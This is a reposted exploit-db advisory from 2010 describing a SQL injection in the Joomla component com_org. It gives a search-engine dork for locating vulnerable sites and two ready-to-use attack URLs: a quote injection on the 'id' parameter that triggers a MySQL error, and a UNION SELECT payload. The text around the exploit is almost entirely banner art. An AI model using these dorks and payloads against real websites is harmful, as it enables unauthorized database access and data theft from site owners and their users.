Joomla! Component com_org – SQL Injection - 体验盒子

作者： N2n-Hacker

日期： 2010-03-14

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11725/

###############################################################################
## ##
##Joomla com_org SQL Injection Vulnerability##
## ##
###############################################################################
\\\\\\\\\\\\\\\\\\\\\\\\\\\N2n-Hacker - 2nd@live.fr////////////////////////////

*******************************************************************************
=> Dork = inurl:"option=com_org"

-------------------------------------------------------------------------------
# EXp : http://www.website.com/path/index.php?option=com_org&task=info&id=22' <=[SQLI] --&#9001;=en

Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"

# http://www.website.com/path/index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --&#9001;=en


********************************************************************************
\\\\\\\\\\\\\\\\\\ BAD LIFE //////////////////

********************************************************************************